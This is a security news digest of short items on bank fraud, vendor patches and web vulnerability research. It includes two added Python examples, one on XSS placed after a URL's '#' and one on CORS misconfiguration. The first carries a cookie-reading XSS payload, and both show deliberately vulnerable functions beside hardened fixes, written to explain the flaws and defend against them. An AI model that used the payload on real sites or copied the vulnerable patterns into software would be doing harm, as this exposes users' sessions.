FBI: ‘Pinball Bandit’ robs another Hyde Park bank. The FBI is searching for a suspect dubbed the “Pinball Bandit” after he allegedly robbed the Fifth Third Bank in Hyde Park, Illinois, March 2 and is suspected of committing five other bank robberies across Chicago since January.
Apple reissues security update after blocking Ethernet on Mac OS X. Apple Inc., reissued a security update for its OS X El Capitan systems to fix a kernel extension blacklisting issue: the initial update mistakenly blacklisted the Ethernet driver, cutting off Internet access on affected Macs that used an Ethernet connection. Apple reported that Wi-Fi connections were not affected.
Cisco patches critical, high severity flaws in NX-OS. Cisco Systems, Inc., released software updates for several of its products, including the NX-OS network operating system (OS) running on Nexus 3000 Series and Nexus 3500 Platform switches, which patched a critical vulnerability that could allow a remote, unauthenticated attacker to log into an affected device with root privileges via an account with default credentials, among other vulnerabilities. Cisco also released patches for several other Nexus series products, including for a high severity denial-of-service (DoS) vulnerability in the Simple Network Management Protocol (SNMP) input packet processor.
Hardcoded password exposes RSA Conference badge scanning app. Researchers from Bluebox Security reported that the badge scanning application provided by organizers of the 2016 RSA Conference to vendors was susceptible to a security bypass flaw after researchers analyzed the app’s code and discovered that the security mechanism could be bypassed due to an embedded plain text default password in the application’s code.
Ad code for many advertising networks vulnerable to basic XSS attacks. An independent security researcher discovered that many advertising networks were unknowingly allowing attackers to launch cross-site scripting (XSS) attacks because their client-side ad code did not apply the same input sanitization to data following a hash (#) in the Uniform Resource Locator (URL) as it applied to the rest of the URL. Because a browser never sends the fragment to the server, server-side filtering cannot catch it; attackers could spread links to legitimate, authentic pages with a malicious XSS payload appended after the hash.
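The Python below is an added example, not the researcher's code or any ad network's: it models in one place what the browser does with the fragment (drops it from the request) and what client-side ad code does with it (reads it back), then shows the same snippet with and without escaping. The URL, the snippet layout and the detector are made up for the example; a real ad tag would be JavaScript reading location.hash, which this simulates with urllib.

```python
"""Added example (not from the original page): a Python model of why a payload
placed after '#' slips past server-side filtering.  Browsers never send the
fragment to the server, so only client-side code ever sees it; if that code
writes location.hash into the page unescaped, the payload runs.  The URL and
snippet layout are constructed for the example."""
import html
from urllib.parse import unquote, urlsplit

# Constructed link: a legitimate article URL with an XSS payload after the hash.
POISONED_URL = ("https://news.example.com/story/42?utm_source=mail"
                "#<img src=x onerror=alert(document.cookie)>")


def request_target(url: str) -> str:
    """What the browser actually puts on the HTTP request line: path and
    query only.  The fragment is gone before any server-side filter runs."""
    p = urlsplit(url)
    return p.path + (f"?{p.query}" if p.query else "")


def client_fragment(url: str) -> str:
    """What client-side code sees in location.hash (decoded, without '#')."""
    return unquote(urlsplit(url).fragment)


def vulnerable_ad_snippet(url: str) -> str:
    """Ad code that reflects the fragment straight into the DOM."""
    return f'<div class="ad-target">{client_fragment(url)}</div>'


def safe_ad_snippet(url: str) -> str:
    """Same code with the fragment HTML-escaped before insertion (in a real
    tag: use textContent, or escape before innerHTML)."""
    return f'<div class="ad-target">{html.escape(client_fragment(url), quote=True)}</div>'


def contains_live_markup(rendered: str) -> bool:
    """Crude detector: does the rendered output still contain an <img> tag
    carrying an onerror handler?  Enough to tell the two snippets apart."""
    lowered = rendered.lower()
    return "<img" in lowered and "onerror=" in lowered


if __name__ == "__main__":
    print(request_target(POISONED_URL))
    print(vulnerable_ad_snippet(POISONED_URL))
    print(safe_ad_snippet(POISONED_URL))
```

The practical consequence is that a web application firewall or server-side sanitizer in front of the site sees exactly what request_target() returns, so the only place this class of bug can be fixed is in the script that reads the fragment.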
Dell SecureWorks speeds up endpoint intrusion detection, response. Dell SecureWorks Inc., reported that it is launching its Advanced Endpoint Threat Detection (AETD) Red Cloak solution which is designed to cut down the time required to detect and respond to cyber-attacks, especially for non-malware attacks. The Software as a Service (SaaS) solution will be powered by experts from the Counter Threat Unit (CTU), who will provide updated threat intelligence information.
Windows built-in PDF reader exposes Edge browser to hacking. A security researcher from IBM’s X-Force Advanced Research team discovered that the Windows Runtime (WinRT) PDF reader built into Windows, which the Edge Web browser uses to render PDF files, can be leveraged by attackers for drive-by attacks in the same way the Angler and Neutrino exploit kits (EK) deliver Flash, Java, or Silverlight payloads. Attackers can embed a WinRT PDF exploit in a PDF file and load it from a Web page through an iframe positioned off screen with Cascading Style Sheets (CSS), so the malicious file is opened and the WinRT PDF vulnerability exploited without the victim noticing.
Police seize at least 250 stolen credit cards in West Greenwich, Cranston. Five New York residents were arrested in Rhode Island February 27 and March 1 after authorities found a total of 309 stolen credit cards and gift cards in the suspects’ vehicles during traffic stops. Three of the culprits used the stolen credit cards to purchase $19,000 worth of merchandise in Virginia and the remaining two suspects used the stolen credit cards to purchase additional gift cards at local Stop & Shop Supermarkets.
NSA chief worries about cyber attack on US infrastructure. The U.S. National Security Agency chief warned March 1 that attackers may try to execute a cyberattack against U.S. infrastructure similar to a 2015 incident in Ukraine in which malware took the networks of several regional electricity companies offline and caused power outages for roughly 225,000 customers. Officials reported that partnerships between the public and private sectors were key to preventing such attacks.
Kaspersky launches Targeted Attack protection platform. Kaspersky Lab released its new solution, Kaspersky Anti Targeted Attack Platform which can help companies reduce the risk of advanced threats and targeted attacks, detect security breaches and attempts to penetrate entities’ networks, and help organizations take immediate mitigation actions. The platform also helps predict where new targeted attacks will occur via an Advanced Sandbox, which provides an isolated environment for analysis of suspicious objects, as well as via a Targeted Attack Analyzer, which leverages data processing and machine learning technology to assess events and combine feedback from various analysis engines.
Microsoft unveils Advanced Threat Protection service. Microsoft released its new service titled, Windows Defender Advanced Threat Protection which is designed to help organizations detect, investigate, and respond to advanced attacks on organizations’ networks and will bring a post-breach layer of protection to the Windows 10 security platform by using Windows behavior sensors, cloud-based security analytics, and threat intelligence.
Google’s DLP for Gmail adds optical character recognition. Google Inc., reported it will release a new set of features for its Data Loss Prevention (DLP) for Gmail, including optical character recognition (OCR) so that administrators can set DLP policies that analyze common image types and extract their text for policy evaluation, as well as improved attachment scanning, new predefined content detectors, and greater control over content detection thresholds.
BluVector 2.0: Machine-learning malware detection. Acuity Solutions reported it will be releasing its BluVector version 2.0, a malware detection solution, which will help companies identify threats, find previously unclassified and undetected attacks, and help security analysts understand how their organizations are being targeted within milliseconds. The threat detection appliance analyzes files from the Hypertext Transfer Protocol (HTTP), Simple Mail Transfer Protocol (SMTP), and File Transfer Protocol (FTP) protocols using BluVector’s machine-learning classification engine and extracts features from each file to determine if the file is malicious based on the device’s knowledge of benign and malicious files.
Former bank VP pleads guilty to fraud. The former vice president (VP) of Mechanics Bank in Water Valley, Mississippi, pleaded guilty February 25 to Federal charges after he embezzled over $1.3 million in an elaborate scheme to obtain bank money, funds, credits, assets, securities, and other property, owned and controlled by Mechanics Bank. The former VP issued loans and lines of credits in the names of unsuspecting bank customers, used the money for personal expenses, and made payments on other fraudulent loans.
Snapchat falls foul of CEO impersonation, hands over employee pay data. The video messaging application Snapchat reported that the payroll information of many of its current and former employees was compromised after an attacker impersonating the firm’s chief executive officer (CEO) in a phishing email persuaded a member of staff to send the data. Snapchat stated that the incident was contained and reported the scheme to the FBI.
One in ten top internet sites may be vulnerable to CSRF and XSS attacks. A CloudFlare engineer discovered that about 10 percent of the Alexa Top 1 Million Web sites allowed their resources to be read from other domains due to improperly configured Cross-Origin Resource Sharing (CORS) settings, for example by reflecting whatever origin made the request in the Access-Control-Allow-Origin header while also allowing credentials, enabling attackers to steal users’ private session details and log into users’ accounts to carry out fraudulent operations via cross-site request forgery (CSRF) and cross-site scripting (XSS) attacks.
The most common vulnerabilities in open source Web applications are XSS and SQLi. The security firm Netsparker released a report detailing that 396 Web applications were plagued with 269 security vulnerabilities, after a study revealed that 180 of the vulnerabilities were cross-site scripting (XSS) flaws, 55 were Structured Query Language (SQL) injection (SQLi) flaws, and 16 were remote and local file inclusion flaws, among other vulnerabilities.
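What "improperly configured CORS" looks like in code is a server-side decision about the Access-Control-Allow-Origin header. The Python below is an added example, not the CloudFlare engineer's scanner or any site's code: it puts the two common bad policies (reflect every origin; match on a suffix) beside an exact allowlist, and models the browser's check for a credentialed request so each policy can be audited against hostile origins. The origins and allowlist are made up for the example.

```python
"""Added example (not from the original page): the CORS decision that the
misconfigured sites got wrong.  cors_headers_reflect() copies whatever Origin
the browser sent into Access-Control-Allow-Origin together with
Access-Control-Allow-Credentials: true, so any site can read a logged-in
user's responses.  cors_headers_allowlist() only ever echoes an origin from
an exact allowlist.  Origins and names are constructed for the example."""
from urllib.parse import urlsplit

ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}


def cors_headers_reflect(origin: str) -> dict:
    """Vulnerable: trusts every origin and still allows cookies."""
    if not origin:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}


def cors_headers_suffix_match(origin: str) -> dict:
    """Also vulnerable, and common: a suffix check instead of an exact match.
    https://evil-example.com ends with 'example.com' and passes."""
    if origin and origin.endswith("example.com"):
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}


def cors_headers_allowlist(origin: str) -> dict:
    """Hardened: exact match on scheme + host (+ port) against a fixed list;
    unknown origins get no CORS headers at all, so the browser blocks the read."""
    if not origin:
        return {}
    parts = urlsplit(origin)
    # Normalise case; anything that is not an https origin is rejected outright.
    normalised = f"{parts.scheme.lower()}://{parts.netloc.lower()}"
    if parts.scheme != "https" or normalised not in ALLOWED_ORIGINS:
        return {}
    return {"Access-Control-Allow-Origin": normalised,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}


def attacker_can_read(headers: dict, attacker_origin: str) -> bool:
    """Model of the browser's check for a credentialed request: the response
    is readable by attacker_origin only if ACAO equals it exactly (a '*' is
    rejected with credentials) and ACAC is 'true'."""
    return (headers.get("Access-Control-Allow-Origin") == attacker_origin
            and headers.get("Access-Control-Allow-Credentials") == "true")


def audit(policy, origins):
    """Which of the supplied hostile origins would a browser let read
    authenticated responses under this policy?"""
    return [o for o in origins if attacker_can_read(policy(o), o)]


# 'null' is what a sandboxed iframe sends, so reflecting it is as bad as any.
HOSTILE_ORIGINS = ["https://attacker.net", "https://evil-example.com",
                   "https://app.example.com.attacker.net", "null"]

if __name__ == "__main__":
    for policy in (cors_headers_reflect, cors_headers_suffix_match, cors_headers_allowlist):
        print(policy.__name__, audit(policy, HOSTILE_ORIGINS))
```

To audit a live site, send the same hostile Origin values with a real session cookie and apply attacker_can_read() to the response headers; any origin that passes can read that endpoint from a page the attacker controls.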
Pentagon boosts spending to fight cyber attacks. The U.S. Secretary of Defense reported February 25 that the Pentagon will spend a total of $6.7 billion in 2017 in an effort to deter advanced cyber adversaries, invest in cyber warfare capabilities, and fund cyber strategy.
Google helps news sites thwart DDoS attacks. Google announced the public release of its Project Shield initiative which aims to protect news Web sites from distributed denial-of-service (DDoS) attacks and aims to keep smaller journalism Web sites safe from cyber-attacks. The initiative now allows small news sites to serve their content through Google’s infrastructure without having to move their hosting location.
90 percent of all SSL VPNs use insecure or outdated encryption. Researchers from High-Tech Bridge discovered that most Secure Sockets Layer (SSL) Virtual Private Network (VPN) servers were using insecure or outdated encryption, after an analysis of 10,436 servers revealed that about 76 percent of them used untrusted SSL certificates, such as self-signed ones, which train users to click through certificate warnings and allow an attacker to impersonate the server and launch man-in-the-middle (MitM) attacks on unsuspecting users.